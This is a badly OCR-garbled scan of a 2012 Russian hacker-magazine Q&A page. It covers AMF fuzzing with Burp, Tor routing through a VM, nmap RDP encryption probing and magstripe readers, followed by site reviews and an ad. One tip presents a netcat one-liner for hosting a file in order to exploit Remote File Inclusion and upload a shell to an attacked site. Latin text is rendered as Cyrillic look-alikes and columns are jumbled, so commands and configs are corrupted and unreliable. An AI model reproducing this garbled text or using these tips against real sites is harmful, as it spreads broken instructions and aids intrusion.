Управление демоном осуществляется 
утилитой еіѵѵсопзоіе, посредством которой 
можно задать разрешающие правила для 
определенных хостов (по умолчанию взаимо- 
действие разрешено только со шлюзом). 
Помимо команд настройки, в комплекте идет 



ряд средств, позволяющих не только обезопа- 
сить себя в агрессивной сети, но и выявить 
потенциальные источники опасности. 
Например, командой рготізсор можно 
определить, на каких хостах включен 
рготізсоиз тобе, а Ііпкіуре определит, 
подключен другой конец патчкорда к свитчу 
или хабу. При обнаружении в «подслушанном» 
трафике поддельных АНР-сообщений (исходя 
из ранее сохраненных соответствий ІР-МАС) 
или при попытке отравления кеша будет 
выдано окно с предупреждением. 

Подскажите, как можно упростить 
поиск уязвимостей во ГІех- 
приложениях, общающихся с сервером при 
помощи АМР? 

Напомню, что АМР (Асііоп Меззаде 
Рогта*) — это бинарный протокол 
взаимодействия фронтенда, написанного на 
АсІіопБсгірІ, с серверной частью. Как 
и большинство подобных (50АР, Э50ІМ, е*с.), он 
реализуется поверх НТТР и позволяет 



передавать данные различных типов. Как 
и для любого основанного на НТТР взаимодей- 
ствия, для работы с АМР незаменимым 
инструментом является хорошо известный 
Вигр 5иі*е, который, начиная еще с версии 
1.2.16, умеет декодировать бинарные сообще- 
ния и представлять их в виде удобочитаемого 
дерева объектов. Также не стоит забывать про 
старый добрый метод автоматизации процесса 
поиска багов — фаззинг. Тем более что после 
представления на ВІаск На* 2012 арсенал 
боевых дополнений для хакерского прокси 
обогатился плагином под названием ВІагег 
( Ьіі.Іу/ЬигратП . После запуска дополненного 
Вигр'а: 

іаѵа -сіаззраіііі Ьигр.іаг; Віаіег.іаг \ 
Ьигр.БІіагЬВигр 

в контекстном меню на вкладке прокси 
появится пункт для вызова ВІагег'а. Для 
полноценного исследования не помешает 
иметь образец сервлета, обрабатывающего 







ЧТО МОЖНО СДЕЛАТЬ, ЧТОБЫ ВЕСЬ ТРАФИК СИСТЕМЫ ШЕЛ ЧЕРЕЗ ТОК? 



Актуальный вопрос. Разумная паранои- 
дальность не бывает лишней, особенно 
когда речь заходит об анонимности в Сети. 
Тогуже сам по себе достаточно защищенное 
средство анонимизации, которая достигает- 
ся за счет многократной пересылки данных 
между случайными узлами сети и шифро- 
ванного туннелирования трафика. Несмотря 
на то что трафик можно перехватить на 
конечном узле (где он расшифровывается), 
Тог считается достойным методом для со- 
хранения анонимности. Для этого в систе- 
му устанавливается Тог-клиент, который 
работает как прокси, — соответственно, во 
всех сетевых приложениях нужно пустить 
трафик через него. Но где гарантия, что 
какое-то из приложений или компонент 
браузера (например, Эаѵа) в какой-то момент 
не передаст настоящий ІР, выполнив прямое 
соединение? 



Пожалуй, самый простой вариант — 
воспользоваться системой, в которой 
уже все настроено для того, чтобы 
отправлять трафик через Тог. Одна из таких 
систем — І_іЬег*ё І_іпих ( рі/Аіее.зи/ІіЬегіе ). 
Это основанная на Оеп*оо система, которая 
может загружаться с флешки или диска. По- 
мимо шифрования данных, в этой системе из 
коробки преднастроены клиенты І2Р и Тог — 
можно сделать так, чтобы файрвол принуди- 
тельно отправлял весь трафик исключительно 
через эти сети. 

Есть другой вариант — для уверенности 
в том, что ни байта значимых данных не будет 
передано в Сеть не через точку выхода лукович- 
ной сети, можно использовать виртуальную ма- 
шину, весь трафик которой «торифицировать» 
за ее пределами. Также этот способ будет поле- 
зен, если нужное приложение не поддерживает 
работу с прокси (подсмотрел на Ы*.1у/Цз*501 ). 



На хост-систему (подразумеваем, что 
под ѴМѵѵаге или ѴИиаІВох ты уже 
предварительно установил ѴѴіпсІоѵѵз) 
устанавливаем точку входа в Тог-сеть Ѵібаііа 
ВипсІІе ( Ьіі.Іѵ/ѴісІаІіаЬип ), затем в конфиге 
(%ІІ5ЕНРН0РІІ_Е%\Арр0а*а\І_осаІ\ѴісІаІіа\*оггс) 
уточняем, что порты для прокси-сервиса и 0І\І5 
нужно открывать на интерфейсе, который 
смотрит в виртуальную машину. 

# 192.168.207.1 - адрес, присвоенный 

# виртуальному адаптеру ѴМыаге 
5оск5І_І5І:епАсІсІге55 192.168.207.1 
ОІЧЗІ-ізІіепАсІсІгезз 192.168.207.1 
ОІЧБРог*: 53 



Далее для гостевой системы назначаем тип 
сетевого подключения Иозі-опіу (из гостевой 
ОС по сети будет доступна только хостовая ОС) 
и задаем статический ІР и маску. 
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Вопросы и ответы 



запросы на серверной стороне. Получив такой 
МП, ВІагег автоматически вытащит из него 
все возможные точки входа, то есть публичные 
методы и принимаемые ими параметры. Далее 
останется только выбрать из списка нужные 
и задать стандартные для фаззера опции — 
множество валидных подставляемых значений 
для различных типов данных, количество 
потоков и набор нестандартных значений, 
потенциально приводящих к выявлению 
уязвимостей (например, для 50І_і — символ 
апострофа). Запустив процесс генерации за- 
просов, можно приступать к анализу сервер- 
ных ответов с помощью штатных инструментов 
Вигр Биііе, вычленяя из массы однотипных 
интересующие нас. Признаками аномальной 
реакции на запрос могут быть как размер от- 
вета, так и МІМЕ-тип или код ошибки. 



□ Иногда нужно, чтобы какой-нибудь 
файл (или статичная страничка) был 
некоторое время доступен по НТТР. Можно 
ли как-нибудь обойтись без установки 
и настройки веб-сервера? 

□ Прекрасно тебя понимаю! Если под рукой 
нет никакого веб-сервера, а из функцио- 
нала требуется лишь отдавать статический 
контент (например, для эксплуатации Ретоіе 
Рііе I псіизіоп и заливки шелла в недра 
атакуемого сайта), то можно обойтись без 
именитых решений и написать простейший 
сервак самому. В этом нам поможет всеми 
любимый швейцарский нож для работы 
с ТСР — ІЧеІсаІ или ІМсаІ (виндовый брат- 
близнец, неизменно идущий в комплекте 
с ІМтар). Для Ыпих это займет не более одной 
строчки: 



мбііе ігие і_сіо пс -1 80 < і псІех.ІтЬтІ ; \ 
сіопе 



БЕЗОПАСНОСТЬ СМАРТФОНА НА АЙОВОЮ 



КАК СНИЗИТЬ РИСК 
ЗАРАЖЕНИЯ АЫОРОт- 
УСТРОЙСТВА КАКОЙ-НИБУДЬ 
МАЛВАРЬЮ? ЕСТЬ ЛИ СПОСОБ? 

Самым эффективным способом 
предотвратитьзаражение как 
на десктоп ных системах, таки на 
мобильных устройствах многие считают 
антивирусные средства. Безусловно, 






Х-Кау— сканер для проверки на уязвимости 



обнаружение и предупреждениезапуска 
зловредов позволяет значительно огра- 
дитьсебя от нежелательных послед- 
ствий. Номы посмотрим на эту проблему 
несколько иначе. 

Если вредоносному приложению 
все-таки посчастливится и оно будет 
запущено, главной его целью будетпо- 
вышение привилегий (по возможности 
III 0 = 0) путем эксплуатации одной из уяз- 
вимостей ОС или компонентов. Соответ- 
ственно, если прикрыть эти уязвимости, 
то сплоит уже не сработает и у мал вар и 
ничего не получится. Хорошо, но как вы- 
яснить, насколько дыряв твой андроид? 

В этом поможет специальный сканер из- 
вести ых уязви мостей X- Рау ( ѵѵѵѵѵѵ.хгау.іо ) 
от авторитетной американской компании 
ОиоБесигИу, специализирующейся на 
отличных решениях в области безопас- 
ности (к примеру, мы рассказывали, как 
с помощью их инструмента бесплатно 
сделать двухфакторную авторизацию 
для любого сервиса). Приложение имеет 
механизм обновления базы уязвимо- 
стей, а на момент написания этого текста 
обучено выявлению восьми критических 
багов. И если какой-нибудь из тестов 
дает положительный результат, то это 
повод призадуматься над внеочередным 
системным обновлением. 

К сожалению, правила боодіе РІау не 
поз вол я ют раз работникам доба вить ути- 
литу в официальный магазин приложе- 
ний. Придется ставить из АРК-файла. 



Также нам понадобится виртуальный 
сетевой интерфейс, через который мы 
сможем соксифицировать наш трафик 
внутри виртуалки перед пробросом его на 
прокси Тог'а. 

Для этого установим в гостевой систему 
ОрепѴРІМ ( ЬіЫу/орепѵрпх ). После в сете- 
вых подключениях появится новое Тар- 
подключение, для которого зададим пара- 
метры: ІР-адрес 10.0.0.1, в качестве адреса 
шлюза укажем адрес виртуального роутера, 
который создадим далее, — 10.0.0.2. В каче- 
стве 0145-сервера выступитТог 0145 на хосто- 
вой системе — 192.168.207.1. Помимо этого для 
нового сетевого подключения нужно назна- 
чить имя (например, Тог) — это пригодится нам 
на следующем шаге. Статус соединения будет 
«Сетевой кабель не подключен». 



Теперь создадим виртуальный роутер, 
который будет соксифицировать 
трафик и пробрасывать его на прокси 
Тог'а. В этом нам поможет утилита Ьабѵрп- 
Іип250ск5, идущая вместе с вовсе не плохим 
ВасІѴРІМ ( ЬіЕІѵ/Ьаб-ѵрп ). Распаковав получен- 
ный архив, выполним следующее: 

ЬасІѵрп-1:ип250ск5 . ехе \ 

--іипсіеѵ 1:арѲ9Ѳ1і:<имя Тар сетевого 
адаптера> 

: 10. 0.0.1:10.0. 0.0:255. 255. 255.0 \ 
--пеііі-р-ірасісіг 10.0.0.2 
--пеііТ-пеітаБк 255.255.255.0 

--50ск5-зегѵег-асІсІг Л 

192.168.207.1:9050 



В результате статус Тар сетевого адаптера 
должен измениться на «Подключено». 



Теперь можно проверить работоспо- 
собность нашей хитрой связки! Что 
касается доступности ресурсов в тене- 
вой доменной зоне .опіоп, то в упоминавшийся 
выше конфиг Іоггс нужно добавить следующие 
строки: 

АиіотарНоБІіБОпКеБОІѵе 1 
АиіотарНоБІіББиТбхеБ .опіоп 
Ѵігіиа1АсИгІ\Іе1:могк 10.192.0.0/10 

После серии этих нехитрых манипуляций все 
должно заработать. 






ХАКЕР 10/165/2012 



141 








РАО 



Батник для ѴѴіпсІоѵѵз — целых три :). 

: Іоор 

псаі -1 80 < іпсІех.ИІітІ 
§о1:о Іоор 

Все, в іпбех.ЫтІ помещаем все, что хотели 
бы отдавать. После запуска можно смело 
коннектиться на стандартный 80-й порт при 
помощи браузера. 

Как определить уровень защищенно- 
сти КОР-сервиса, имея лишь внешний 
анонимный доступ? 

Вполне резонное желание. Обнаружив на 
сканируемом хосте открытый 3389-й 
порт, разумеется, ты заинтересуешься, 
насколько он защищен. Поддерживает ли 
сервис шифрование и если да, то какое? Ведь 
от этого будет зависеть, имеет ли смысл 
пассивное прослушивание сетевого трафика 
в ожидании удаленного логина. Расставить 
точки над ё нам поможет несложный скрипт 
гбр-епшті-епсгурііоп из состава незаменимого 
сканера ІМтар ( птар.огд ). Если у тебя стоит не 
самая свежая версия, рекомендую для 
получения максимального функционала 
загрузить сырцы из официального 5ѴІМ- 
репозитория ( Ьіі.іу/птарзѵп ) и провести сборку 
самостоятельно. Скрипт запускается, как и все 
стандартные ЫВЕ-расширения, путем старта 
Ытар'а с параметром --зсгірі: 

птар -р 3389 --зсгі рі: \ 

гсір-епит-епсгѵріііоп 192 . 168 .13.37 

При наличии запущенного РОР-сервиса по 
адресу 192.168.13.37 ІМтар попробует под- 
ключиться с использованием всех методов 
различной защищенности (их на самом деле 
не так уж и много — Ыаііѵе РйР, с использова- 
нием 55І_ или СгесІ55Р] и различных крипто- 
профилей. В результате будет выведен список 
поддерживаемых механизмов обеспечения 
безопасности. 

Посоветуйте, пожалуйста, средство 
для быстрой отладки сложных 
регулярных выражений. 

Регулярные выражения — очень 
мощный и удобный инструмент для 
обработки различной информации, но зача- 



стую в процессе создания выражение 
принимает на первый взгляд пугающий вид. 

Но пугаться не стоит, а разобраться, какая 
часть для чего, поможет замечательная 
утилита Редех Ріхіе ( ѵѵѵѵѵѵ.гедехріхіе.сот ). 

В одну из текстовых областей главного окна 
помещается предмет парсинга (текст или 
любой другой набор символов], и по мере 
задания или правки регулярного выражения 
обнаруженные соответствия будут подсвечи- 
ваться. Все происходит в режиме реального 
времени, что позволяет быстро обнаруживать 
и исправлять допущенные ошибки. Функцио- 
нал также позволяет работать со сложными 
выражениями для «умной» замены найденных 
соответствий, причем результат, как и под- 
светка вхождений, не заставит себя ждать, и в 
области Оиіриі отобразится текст с произве- 
денными согласно правилу замещениями. 
Специальная область ОиІриШпІу содержит 
только затронутые правилами данные, на 
случай, если необходимо отделить соответ- 
ствия от остального текста. Иными словами, 
Ріхіе — весьма приятный инструмент, 
способный облегчить написание регулярок, и, 
безусловно, будет полезен, если ты недавно 
встал на путь постижения хитрых РедЕхр'ов :). 

В прошлом номере для исследования 
ІІБВ-взаимодействия описывался 
способ для І_іпих. А как же ѴѴіпсІоѵѵз? 

ѴѴіпсІоѵѵз не стоит в стороне, и, конечно, 
есть способы отснифать 115В и в этой ОС. 
Единственная загвоздка заключается в том, что 
большинство соответствующих инструментов 
распространяется под коммерческими 
лицензиями, а значит, платные. Тем не менее 
для знакомства с миром информации, циркули- 
рующей в ІІ5В-шине, можно воспользоваться 
утилитой ЦБВІѵгег ( ѵѵѵѵѵѵ.изЫѵгег.сопп ). 
Триальная версия не содержит каких-либо 
существенных ограничений и работает целых 
30 дней с момента установки. Впрочем, если за 
отведенный месяц интерес к анализу устройств 
не угаснет, ты сможешь найти решение на 
просторах Сети :). В процессе инсталляции 
будет установлен драйвер для перехвата 
данных на уровне ядра, и после перезагрузки 
можно приступать к работе. Интерфейс 
интуитивно понятен — в древовидном списке 
отмечаем устройства, за которыми будем 



наблюдать, жмем «5іагІ Саріиге» и в области 
лога наблюдаем проносящиеся от корневого 
контроллера к драйверам устройств пакеты. 

Как работают устройства для считыва- 
ния магнитных карт, подключаемые 
к смартфонам через аудиоразъем? 

Предоставляемый с недавних пор 
некоторыми банками сервис оплаты прямо 
с кредитки действительно из аппаратного 
обеспечения требует лишь смартфон с подклю- 
ченным вместо гарнитуры ридером. Но никакой 
сложной электронной начинки внутри этого 
специального девайса на самом деле нет. Все, 
что прячется за слоем пластика, — обыкновен- 
ная считывающая магнитная головка, наподо- 
бие тех, что есть в любом кассетном плеере, 
напрямую подключенная к контактам, обычно 
предназначающимся для микрофона в гарниту- 
ре. Приложение, запущенное на смарте, 
принимает аудиопоток, приходящий с этого 
специфичного микрофона. Колебания в микро- 
фоне возбуждаются не звуком, а изменениями 
магнитного поля при проведении магнитной 
полосой вдоль считывающей головки. Если 
отобразить осциллограмму полученной 
звукозаписи, станет заметно, что частота 
сигнала непостоянна, именно ее изменением 
и кодируются биты информации. В начале 
каждой дорожки всегда размещается несколько 
нулей, задающих эталонную частоту, относи- 
тельно этого значения увеличение вдвое 
означает появление единицы. Далее таким 
образом считанные и распознанные биты 
компонуются в немного необычные байты 
по пять штук и преобразуются в один из 16 
допустимых для кодирования символов (цифры 
и спецсимволы разделения полей). 

Для подтверждения заказа, сделанного 
в США через интернет, требуется 
телефонный звонок с американского номера, 
а звонки через скайп не обрабатываются. 

Как быть? 

Довольно распространенная ситуация. 
Простейший способ — попросить 
позвонить кого-нибудь из знакомых амери- 
канцев. Но можно обойтись и без них, 
воспользовавшись одним из сервисов 
предоставления анонимного телефонного 
номера, например Вигпег ( Ьигпегарр.сот ). 
Вигпег представляет собой приложение для 
іРбопе, реализующее пользовательский 
интерфейс для работы с голосовыми вызова- 
ми и 5М5, подобный стандартному. За 
умеренную плату для использования 
предлагается обычный с виду телефонный 
номер с международным кодом +1. С этого 
номера можно производить и принимать 
звонки, а также полноценно работать 
с сообщениями посредством мобильного 
приложения. В нашем случае при обращении 
к такому сервису к плате за предоставленный 
заморский номер прибавится еще и тариф до 
него. Но цель будет достигнута: конечный 
абонент увидит на своем определителе 
номера американский СаІІегЮ. ПЕ 
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Ріхіе — сложные регулярные выражения 
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| В I ТСО I N : КРИПТОВАЛЮТА БУДУЩЕГО- 








ІЖІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 



РНОМЕРЕСК 



рбопесіеск.сот 

Приложение, позволяющее получить из браузера прямой доступ ктелефонной части 
твоего АпсІгоісІ-смартфона. Благодаря РЬопесІеск тебе куда реже придется тянуться 
за «трубкой» — сервис будет показывать оповещения о входящих звонках и 5М5 прямо 
в СЬготе, позволит копировать информацию из адресной книги и сообщений и посылать 
номер для набора прямо в телефон. Браузер также сможет напоминать о пропущенных вы- 
зовах, показыватьуровень заряда батареи в смартфоне и (моя любимая функция] включать 
«режим обнаружения» на телефоне, при котором смартфон начинает подавать громкий 
сигнал, позволяющий найти его в любом бардаке. Пожалуй, сервису не хватаеттолько под- 
Инструмент, позволяющий обращаться «телефонным функциям Д е Р жки работы с двумя смартфонами и возможности посылать на телефон гиперссылки 

АпсІгоісІ-смартфона прямо из браузера и адреса (в духе СЬготе То РЬопе: Ьіі.1у/С1"іготе2рЬопе ). 




РВСОЕСТ ЕІ)І_ЕР 



ргоіесіеиіег.пеі 

Если І_ито5ІІу ( Іитозііѵ.сот ) — это пища для ума простых смертных, то Ргоіесі Еиіег пред- 
лагает задачки специально для программистов. На сайте выложен набор вычислительных 
задач, которые можно и нужно решить с помощью элегантного алгоритма. Используемый 
язык программирования при этом не имеетзначения. Как пишут составители задачника, 
обратиться к справочной литературе тоже не возбраняется — ведь главное, чтобы игрок 
узнал как можно больше о математике и программировании. В конечном счете мало найти 
ответ — желательно придумать еще и эффективный алгоритм, ведь по замыслу авторов 
выполнение программы не должно занимать больше минуты. Существует и русский пере- 
вод большинства задач ( еиіегіакито.ога ). но для участия в рейтинге и доступа к правиль- 
Сборникзадачпопрограммированиюдлялюбителейматематики ным ответам придется пользоваться оригинальным сайтом. 





На редкость красноглазая надстройка для популярногоонлайн- 
блокнота, добавляющая много интересныхвозможностей 



ѲЕЕКЫОТЕ 



аеекпоіе.те 

Очень интересный альтернативный клиент для популярного сервиса заметок Еѵегпоіе, 
позволяющий синхронизировать файлы из локальной папки сучетной записью пользова- 
теля. Первое следствие — заметки превращаются в обычные текстовые файлы, работать 
с которыми можно с помощью любимого текстового редактора (поддерживается работа 
на языке верстки МагМоѵѵп). Второе — можно синхронизировать любые файлы (например, 
логи с сервера, для чего беекпоіе и создавался). Третье — в работе можно использовать 
любые инструменты из ІІІМІХ-окружения. На сайте предусмотрен эмулятор терминала, по- 
зволяющий протестировать инструмент или же получить текстовый доступ к своим файлам 
с чужого компьютера. 



МОТЕВООКСНЕСК.МЕТ 



поіеЬооксбеск.пеІ 

При выборе ноутбука для покупки часто выясняется, что обзоров модели совершенно не- 
достаточно для принятия решения. На помощь приходит ІМоІеЬооксЬеск — обширная база 
бенчмарков по всем существующим ноутбучным процессорам и видеокартам. Для каждого 
чипа приводятся подробные характеристики и результаты десятков тестов, а для ви- 
деокарт есть и данные об РР5 в популярных играх (на примерах конкретного ноутбука). 

На сайте есть рейтингчипов и фильтр, позволяющий напрямую сравнить любое количе- 
ство процессоров или видеокарт. Словом, это просто незаменимый инструмент, который 
ты определенно оценишь при покупке очередной «обновки». 



Обширнейшая база бенчмарков мобильных процессоров и видеокарт 
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АЗІІЗ рекомендует ѴѴіпсІом/з® 7. 



Дух инноваций • Путь к совершенству 




АЗШЗ 2ЕШ00К™ Ргіте 

Невероятный ІІІІгаЬоок™. Вдохновлен ІпіеІ. 

С подлинной ОС ѴѴіпсІоѵѵз® 7 Домашняя расширенная 



В ПОИСКАХ НЕВЕРОЯТНОГО 

Самый утонченный ультрабук стал еще лучше благодаря высококачественному 
ІРЗ-дисплею формата РиІІ НЮ с широкими углами обзора. Превосходное качество 
изображения, высокопроизводительный процессор ІпіеІ® Соге™ І7 и мощное 
графическое ядро делают элегантный 2ЕІМВ00К™ Ргіте идеальной платформой 
для мультимедийных развлечений. 




Всемирная гарантия 2 года ѵѵѵѵѵѵ.азиз.ги 

Горячая линия АЗІІЗ: (495) 23-1 1 -999, 8-800-1 00-2787 ѵѵѵѵѵѵ.азизпЬ.ги 



АЗІІЗ 7его ВгідШ йо!: 30-дневная дополнительная гарантия отсутствия на экране 
неисправных ярких точек. Подробнее на ѵѵѵѵѵѵ.азизпЬ.ги/гЬсі 

Эксклюзивная сервисная программа АЗІІЗ Ріск ир & Веіигп для ноутбуков 
УХ21/1Ш1. Подробности на ѵѵѵѵѵѵ.азизпЬ.ги/РУВ 




Реклама. ІпіеІ, логотип ІпіеІ, ІпіеІ Іпзісіе, ІпіеІ Соге, ІЛігаЬоок и Соге ІпБісІе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 




